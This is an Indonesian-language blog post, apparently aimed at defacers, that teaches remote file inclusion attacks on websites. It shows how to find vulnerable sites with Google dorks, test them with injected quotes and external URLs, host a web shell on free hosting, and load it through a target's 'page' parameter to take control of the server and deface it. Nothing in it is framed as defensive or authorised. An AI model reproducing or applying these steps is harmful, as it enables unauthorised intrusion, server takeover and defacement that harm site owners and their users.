RFI kepanjangan dari remote file inclusion, kerentangan ini paling umum kita temukan pada beberapa server website, apabila kalian dapat mengeksekusi file remote kalian bisa mendapatkan kontrol atas server website itu sepenuhnya dan anda juga dapat menjalankan file di dalamnya.
mungkin kalian bertanya : mr.read bagaimana cara saya melakukannya ??
oke saya akan membuka sedikit trik untuk memulai kalian belajar,
kita harus mendapatkan situs situs yang rentang terlebih dahulu ..
cara mendapatkannya ada banyak tool yang bisa di gunakan seperti grenox dan bingoo mungkin kalian sudah memiliki tool sendiri untuk mengscan drok google..
BACA JUGA : software grenox dan havist gratis tool bingoo alat scan drok
sebelum kalian memulai kalian harus memiliki drok yang dapat mencari website yang ada kerentangannya , cara manual scan drok pada browser ada bukan situs dari pencarian drok lalu buka link situs tersebut ke browser dan tambahkan tanda ( " ) petik di belakangnya . apabila SQL pada situs ERROR dengan beberapa kesalahan berarti website itu rentang dan dapat kalian coba masuki.
DROK GOOGLE RAKITAN GRATIS
baiklah kita mulai dengan DROK biasa perhatikan langkah demi langkah di bawah ini :
scan drok ini : inurl: index.php? Page =
apabila kalian menscannya kalian akan menemukan beberapa situs seperti ini :
www.Targetsite.com/index.php?page = ( CONTOH )
lalu coba kalian tambahkan seperti contoh dibawah ini :
http://www.Targetsite.com/index.php?page=http://www.google. com ( CONTOH )
apabila situs tersebut saat kita buka pada browser maka situs tersebut sangatlah rentang terhadap RFI atau remote file inclusion.
sekarang kalianharus mensiapkan SHELL mungkin juga kalian sudah memilikinya shell di indonesia ada banyak jadi kalian bisa cari di google .
shell adalah sebuah payload untuk kita mengupload script deface kita :
sekarang kalian hanya perlu mengupload sheel tersebut ke web hosting gratis ,,
apabila kalian sudah menguploadnya kalian akan mendapatkan link menuju shell kalian contoh :
http://shell.webhost.com/shell/CTD.php (CONTOH)
apabila kalian sudah mendapatkan link itu kalian cukup mengganti link ini :
http://www.Targetsite.com/index.php?page=http://www.google. com (contoh)
menjadi
http://www.Targetsite.com/index.php?page=http://shell.webhost.com/shell/CTD.php? (contoh)
PENTING : tanda (?) pada akhir link itu sangatlah penting apabila tidak ada shell kalian tidak akan berkerja atau di jalankan.
sekarang anda sudah tau apa yang anda harus lakukan apabila sudah berada di shell kalian, carilah control ke panel situs terget selebihnya itu terserah anda ,,
selamat mencoba
Posts
0 comments:
Post a Comment